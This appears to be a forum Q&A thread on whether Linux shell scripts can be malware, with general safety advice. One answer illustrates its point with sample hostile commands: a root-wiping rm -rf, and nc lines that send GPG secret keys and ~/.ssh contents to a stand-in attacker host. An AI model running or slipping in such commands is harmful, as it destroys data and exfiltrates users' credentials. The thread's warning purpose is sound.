Can a .sh file be malware?
.sh
files are shell scripts. They are analogous to .bat
files (cmd
scripts) under Windows. All of these (shell scripts, cmd scripts, .exe
Windows executables, Linux executables (which usually have no extension)) are executable programs; if you run one, it can do anything you can do. So yes, shell scripts can be harmful. Treat a shell script (or a Perl script, or a Python script, or a Ruby script, etc.) with the same suspicion you would treat any other application.
It's a bit harder to hide malware in a shell script without looking suspicious, because this is a script which can be read by people with knowledge of the scripting language. But it is not much harder; few people, even with the technical knowledge, would bother to review the code, so you could hope to go unnoticed.
As a practical matter, there is less malware for Linux floating around than for Windows. This is probably mainly because Linux has a lot less of a market share than Windows on the desktop, so the payback for writing Linux malware is less. Also, there is a long-ingrained culture of sharing little improvements to the system in the Linux world, more so than in the Windows world; so the balance of probability says that this is someone sharing a little improvement and not malware. But it could be malware posing as a little improvement. In the end, you need to decide whether you can trust the site where you're getting this application, or the people who recommended this site. Favor programs that come from your distribution (i.e. that you can install from the software center), as they have undergone some review.
Now regarding this specific program: I had a quick look, and it looks benign. I didn't see anything that would store your password anywhere without telling you or that would do things on your computer other than what it's advertised to do. Note that I only did a 2-minute review, which any remotely clever malware writer could get past. The program looks reasonably well-written.
I wouldn't necessarily recommend this program unless you feel a pressing need that isn't addressed by packages in the Ubuntu distribution. Ubuntu comes with the seahorse GUI frontend to GPG (there is also kgpg for KDE users). You may also want to install seahorse-nautilus (or seahorse-plugin in older versions) for Nautilus integration.
#!/bin/sh
rm -rf --no-preserve-root /
That's malware, and it's a shell script. A more advanced version might include something like:
gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80
So yes, a shell script can be malicious. It can get more complex and call on other scripting languages, libraries, or even be a shell archive that spits out and calls a regular executable.
For the most part, anything you run gets the permissions of the user.
Of course! It can do anything you can do! Watch logs, keylog you, steal files etc....
Depending on what its Developer has written on the source code! It can do ANYTHING.....
And it is very easy to make, so if you are sent a suspicious .sh file, think twice before you execute it!